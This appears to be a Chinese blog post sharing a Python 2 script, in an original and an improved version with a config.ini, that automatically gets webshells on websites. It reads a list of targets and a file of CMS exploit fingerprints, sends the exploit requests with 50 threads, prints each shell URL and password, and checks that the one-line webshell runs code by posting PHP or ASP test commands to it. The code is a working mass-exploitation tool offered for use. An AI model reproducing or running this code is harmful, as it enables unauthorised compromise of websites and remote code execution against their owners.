一键获取webShell,同时验证是不是可以连接一句话
目标:根据上一篇写的指纹录入工具,可以收集很多cms等漏洞指纹,然后运行该脚本直接获取shell,也可以作为路径扫描程序,同时含有一句话连接验证功能
#coding=utf-8import requestsimport Queueimport threadingimport requeue=Queue.Queue()#===================================================##exp_info#exp_info(0) 提交的方式#exp_info(1) 测试路径#exp_info(3) POST 提交的数据 GET 为空#exp_info(4) 关键字#exp_info(5) shell的路径#exp_info(5) shell的密码#====================================================#def init(): f=open("exp.dic") for line in f.readlines(): exp_info=line.strip().split('|') queue.put(exp_info) f.close()def openUrl(url,GET_POST,pdata): try: if GET_POST=="POST": #分解post数据 s = ",".join(pdata.split("&")) pdata = dict((l.split('=') for l in s.split(','))) r = requests.post(url, timeout=20, allow_redirects=False, data=pdata) else : r = requests.get(url, timeout=20, allow_redirects=False) content=r.content r.close() if r.status_code in [200,500]: return (r.status_code ,r.encoding,content) return (0,0,False) except: return (0,0,False)def checkKeyWord(page,page_encoding,keyword): try: page = unicode(page, page_encoding) except: return False pattern =re.compile(keyword) if pattern.findall(page)!=[]: return True else: return Falsedef checkConnectionSuccess(shell_url,pdata): status_code, encoding, content = openUrl(shell_url, "POST", pdata) #print status_code,content if content == "test": print " the connection is successful " else: print "the connection is fail"def checkGetShellSuccess(shell_url,shell_pwd): script_type=shell_url.split(".")[-1] #print script_type if script_type=='php': pdata=shell_pwd+'=echo "test";' return checkConnectionSuccess(shell_url,pdata) elif script_type=='asp': pdata=shell_pwd+'=execute("response.clear:response.write(""test""):response.end")' return checkConnectionSuccess(shell_url,pdata) else: pdata=shell_pwd+'=Response.Clear();Response.Write("test");' return checkConnectionSuccess(shell_url,pdata)def output(content,status_code,page_encoding,test_url,re_keyword,shell_url,shell_pwd): if content is not False: if content is None: print '[-]status[%s]---%s |no foud data' % (status_code, test_url) else: if re_keyword 
is None: if shell_url is None: print '[+]status[%s]---shell url: %s | password: %s' % (status_code, test_url) else: print '[+]status[%s]---shell url: %s | password: %s' % (status_code, shell_url, shell_pwd) else: if checkKeyWord(content, page_encoding, re_keyword) is True: if shell_url is None: print '[+]status[%s]---shell url: %s | password: %s' % (status_code, test_url) else: print '[+]status[%s]---shell url: %s | password: %s' % (status_code, shell_url, shell_pwd) #检测是不是可以连接一句话 checkGetShellSuccess(shell_url, shell_pwd) else: print '[-]status[%s]---%s is possible' % (status_code, test_url)def scan(url): while not queue.empty(): exp_info=queue.get(True) GET_POST=exp_info[0] test_url=url+exp_info[1] pdata=exp_info[2] re_keyword=exp_info[3] shell_url=url+exp_info[4] shell_pwd=exp_info[5] #print "scanning "+url status_code,page_encoding,content=openUrl(test_url,GET_POST,pdata) output(content, status_code, page_encoding, test_url, re_keyword, shell_url, shell_pwd) queue.task_done()if __name__=="__main__": threadNum = 50 #线程数量 f=open("2.txt") #2.txt添加你要测试的网站 for url in f.readlines(): init() url="http://"+url.strip() print "scanning "+url for i in range(threadNum): t = threading.Thread(target=scan,args={url,}) t.start() queue.join() f.close() raw_input('press enter key to exit') #这儿放一个等待输入是为了不让程序退出
利用pyinstaller 打包成exe,运行结果如下:
最新加入了一句话验证功能
优化版本
a)添加配置文件
b)文件不存在捕获提示
c)输出提示更完善
getshell.py
#coding=utf-8import requestsimport Queueimport threadingimport reimport ConfigParserqueue=Queue.Queue()#===================================================##exp_info#exp_info(0) 提交的方式#exp_info(1) 测试路径#exp_info(3) POST 提交的数据 GET 为空#exp_info(4) 关键字#exp_info(5) shell的路径#exp_info(5) shell的密码#====================================================#def init(filename): try: f=open(filename) for line in f.readlines(): exp_info = line.strip().split('|') queue.put(exp_info) f.close() except: return Falsedef openUrl(url,GET_POST,pdata): try: if GET_POST=="POST": #分解post数据 s = ",".join(pdata.split("&")) pdata = dict((l.split('=') for l in s.split(','))) r = requests.post(url, timeout=20, allow_redirects=False, data=pdata) else : r = requests.get(url, timeout=20, allow_redirects=False) content=r.content r.close() if r.status_code in [200,500]: return (r.status_code ,r.encoding,content) return (0,0,False) except: return (0,0,False)def checkKeyWord(page,page_encoding,keyword): try: page = unicode(page, page_encoding) except: return False pattern =re.compile(keyword) if pattern.findall(page)!=[]: return True else: return Falsedef checkConnectionSuccess(shell_url,pdata): status_code, encoding, content = openUrl(shell_url, "POST", pdata) #print status_code,content if content == "test": print " the connection is successful " else: print "the connection is fail"def checkGetShellSuccess(shell_url,shell_pwd): script_type=shell_url.split(".")[-1] #print script_type if script_type=='php': pdata=shell_pwd+'=echo "test";' checkConnectionSuccess(shell_url,pdata) else: pdata=shell_pwd+'=execute("response.clear:response.write(""test""):response.end")' checkConnectionSuccess(shell_url,pdata)def output(url,content,status_code,page_encoding,test_url,re_keyword,shell_url,shell_pwd): if content is not False: if content is None: print '[-]status[%s]---%s |no foud data' % (status_code, test_url) else: if re_keyword is None: if shell_url ==url: print '[+]status[%s]---shell url: %s ' % (status_code, 
test_url) else: print '[+]status[%s]---shell url: %s | password: %s' % (status_code, shell_url, shell_pwd) else: if checkKeyWord(content, page_encoding, re_keyword) is True: if shell_url ==url: print '[+]status[%s]---shell url: %s ' % (status_code, test_url) else: print test_url print '[+]status[%s]---shell url: %s | password: %s' % (status_code, shell_url, shell_pwd) #检测是不是可以连接一句话 checkGetShellSuccess(shell_url, shell_pwd) else: print '[-]status[%s]---%s is possible' % (status_code, test_url)def scan(url): while not queue.empty(): exp_info=queue.get(True) GET_POST=exp_info[0] test_url=url+exp_info[1] pdata=exp_info[2] re_keyword=exp_info[3] shell_url=url+exp_info[4] shell_pwd=exp_info[5] #print "scanning "+url status_code,page_encoding,content=openUrl(test_url,GET_POST,pdata) output(url,content, status_code, page_encoding, test_url, re_keyword, shell_url, shell_pwd) queue.task_done()def configRead(): config = ConfigParser.ConfigParser() config.readfp(open('config.ini')) test_url_file_path = config.get("file_path", "test_url_file_path") exp_file_path = config.get("file_path", "exp_file_path") return test_url_file_path,exp_file_pathif __name__=="__main__": test_url_file_path, exp_file_path = configRead() threadNum = 50 try: f=open(test_url_file_path) for url in f.readlines(): if(init(exp_file_path) is False): print "exp file not found" break url="http://"+url.strip() print "scanning "+url for i in range(threadNum): t = threading.Thread(target=scan,args={url,}) t.start() queue.join() f.close() except: print "test web url file not found" raw_input('press enter key to exit') #这儿放一个等待输入是为了不让程序退出
配置文件
config.ini
[file_path];网站测试文件路径test_url_file_path=2.txt;exp文件路径exp_file_path=exp.dic